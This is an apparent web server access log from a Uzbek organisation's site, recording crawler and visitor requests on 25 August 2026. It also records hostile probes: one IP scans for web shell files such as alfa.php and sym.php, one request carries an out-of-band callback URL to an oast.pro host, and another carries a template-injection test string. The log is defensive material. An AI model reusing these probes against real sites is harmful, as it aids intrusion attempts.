20.251.63.238 - - [25/Aug/2026:00:52:48 +0500] "GET /inx.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:52:55 +0500] "GET /vpn.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:53:02 +0500] "GET /shiny.php HTTP/1.1" 404 1234 "-" "-"
1.92.205.213 - - [25/Aug/2026:00:53:09 +0500] "GET /uz/officially-uzb/vacancies-uzb/6193-fixed-assets/9894-reestr-xarid-9-2024-xlsx HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
20.251.63.238 - - [25/Aug/2026:00:53:08 +0500] "GET /goods.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:53:17 +0500] "GET /user3.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:53:23 +0500] "GET /waff.php HTTP/1.1" 404 1234 "-" "-"
34.42.229.145 - - [25/Aug/2026:00:53:28 +0500] "GET /uz/officially-uzb/purchasing-commission-documentation-uzb/6193-fixed-assets/9913-reestr-xarid-3-2025-xlsx HTTP/1.1" 200 32353 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.251.63.238 - - [25/Aug/2026:00:53:31 +0500] "GET /alfa.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:53:39 +0500] "GET /33.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:53:46 +0500] "GET /133.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:53:55 +0500] "GET /sym.php?p= HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:54:04 +0500] "GET /8.php HTTP/1.1" 404 1234 "-" "-"
34.171.68.95 - - [25/Aug/2026:00:54:16 +0500] "GET /uz/?cats=1&start=18 HTTP/1.1" 200 60556 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
207.46.13.83 - - [25/Aug/2026:00:54:58 +0500] "GET /uz/?v=1&start=6 HTTP/1.1" 200 60733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
220.181.108.103 - - [25/Aug/2026:00:55:18 +0500] "GET /stockholders-rus/prospectus-rus/2-uncategorised/9709-ensuring-openness-ru HTTP/1.1" 200 33324 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
34.10.180.98 - - [25/Aug/2026:00:56:04 +0500] "GET /?a=1&start=48 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
54.166.104.83 - - [25/Aug/2026:00:57:08 +0500] "GET /uz/?qtproxycall=http://ce4utud5ele8pmo00010toc38eigbk5wg.oast.pro&start=54 HTTP/1.1" 200 63755 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
136.119.35.120 - - [25/Aug/2026:00:57:10 +0500] "GET /officially-rus/consideration-of-complaints-suggestions-rus/9708-appeals-06-2022 HTTP/1.1" 200 34289 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
85.208.96.195 - - [25/Aug/2026:00:57:32 +0500] "GET /robots.txt HTTP/1.1" 200 865 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.2 - - [25/Aug/2026:00:57:32 +0500] "GET /?start=54&x=%7Bsource%7DTRIPROBE%7B%2Fsource%7D HTTP/1.1" 200 63342 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.206 - - [25/Aug/2026:00:57:57 +0500] "GET /uz/officially-uzb/purchasing-commission-documentation-uzb/2-uncategorised/9728-ensuring-openness-uz HTTP/1.1" 200 33278 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
